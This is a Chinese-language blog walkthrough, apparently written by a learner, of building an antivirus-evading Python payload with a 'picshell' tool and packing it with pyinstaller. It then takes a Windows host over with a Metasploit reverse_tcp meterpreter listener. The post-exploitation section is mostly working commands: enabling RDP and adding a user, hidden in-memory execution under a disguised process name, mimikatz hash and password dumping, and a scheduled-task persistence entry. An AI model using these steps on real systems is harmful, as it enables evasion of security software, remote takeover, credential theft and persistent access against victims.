python實現的分離免殺（包含pyinstaller的安裝與使用）

題記

        今天本來打算學python的，突然看到萌萌噠的小玉玉發了個免殺的工具，迫不及待的來試試了。此貼記錄我實際操作的整個過程，在此膜拜大神，大神上次還分享了個0day（雖然爛大街了），但是對於我這個菜鳥來說，還是很有幫助的。

        項目地址：https://gitee.com/cutecuteyu/picshell_bypassav

        視頻教程（附帶代碼解析）：http://bilibili.com/video/BV1LA41147NQ

一、准備工作

        機器：kali（ip：192.168.0.119）、win10（ip：192.168.0.200）

        圖片：3.jpg

        環境：python3

二、安裝pyinstaller

pyinstaller的安裝

        2.1在cmd輸入pip install pyinstaller 安裝python打包成exe的工具。

        2.2在 PyInstaller 模塊安裝成功之后，在 Python 的安裝目錄下的 Scripts(D:\Python\Python36\Scripts) 目錄下會增加一個 pyinstaller.exe 程序，接下來就可以使用該工具將 Python 程序生成 EXE 程序了。

三、實現免殺程序生成

        3.1kali解壓picshell的包。

        3.2命令行中運行python3 picshell.py

        按照步驟

        請輸入圖片的路徑 :3.jpg（相對路徑，最好是和picshell.py在同一文件夾下）

        請設置lhost (默認:127.0.0.1):192.168.0.119

        請設置lport (默認:4444):

        會生成payload.py與一個output文件夾。

        3.3將生成的payload.py放到windows上用：pyinstaller -F payload.py生成exe文件

        3.4將exe文件與注入后的圖片放在同一目錄即可使用

四、程序利用

        4.1kali啟動msf

        注意：首次啟動需要鏈接數據庫

        msfconsole

        進入后開啟監聽模式

        set payload windows/meterpreter/reverse_tcp

        set lhost 192.168.0.119

        show options

        4.2開啟監聽后在另一個機器運行我們的木馬（可改名）。可以看到拿到權限。

        4.3利用（參考：http://cnblogs.com/backlion/p/9484949.html）

（1）開啟3389

run post/windows/manage/enable_rdp

（2）創建用戶加入桌面組

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh." 

help# 查看Meterpreter幫助

background#返回，把meterpreter后台掛起

bgkill# 殺死一個背景 meterpreter 腳本

bglist#提供所有正在運行的后台腳本的列表

bgrun#作為一個后台線程運行腳本

   

channel#顯示活動頻道

sessions -i number # 與會話進行交互，number表示第n個session,使用session -i 連接到指定序號的meterpreter會話已繼續利用

sesssions -k  number #與會話進行交互

close# 關閉通道

exit# 終止 meterpreter 會話

quit# 終止 meterpreter 會話

interact id #切換進一個信道

(3)execute命令

"execute"命令為目標主機上執行一個命令，其中"execute -h"顯示幫助信息。-f為執行要運行的命令,

在目標主機上運行某個程序,例如我們目前注入進程到explorer.exe后，運行用戶為超級管理administrator

我們運行一下目標主機上的記事本程序

execute  -f notepad.exe

目標主機上立馬彈出來一個記事本程序，如下圖：

這樣太明顯，如果希望隱藏后台執行，加參數-H

execute  -H -f notepad.exe

此時目標主機桌面沒反應，但我們在meterpreter會話上使用ps命令看到了

再看一個，我們運行目標主機上的cmd.exe程序，並以隱藏的方式直接交互到我們的meterpreter會話上

命令：

execute  -H -i -f cmd.exe

這達到的效果就跟使用shell命令一樣了

再來一個，在目標主機內存中直接執行我們攻擊主機上的攻擊程序，比如wce.exe，又比如木馬等，這樣可以避免攻擊程序存儲到目標主機硬盤上被發現或被查殺。

execute  -H -m -d notepad.exe-f  wce.exe -a "-o wce.txt"

-d 在目標主機執行時顯示的進程名稱（用以偽裝）

-m 直接從內存中執行

 "-o wce.txt"是wce.exe的運行參數

（4）mimikatz

meterpreter > load mimikatz  #加載mimikatz

meterpreter > msv #獲取hash值

meterpreter > kerberos #獲取明文

meterpreter >ssp   #獲取明文信息

meterpreter > wdigest #獲取系統賬戶信息

meterpreter >mimikatz_command -f a::   #必須要以錯誤的模塊來讓正確的模塊顯示

meterpreter >mimikatz_command -f hash::   #獲取目標 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

SCHTASKS /Create /TN calc /TR d:\shell\payload.exe /SC DAILY /ST 10:54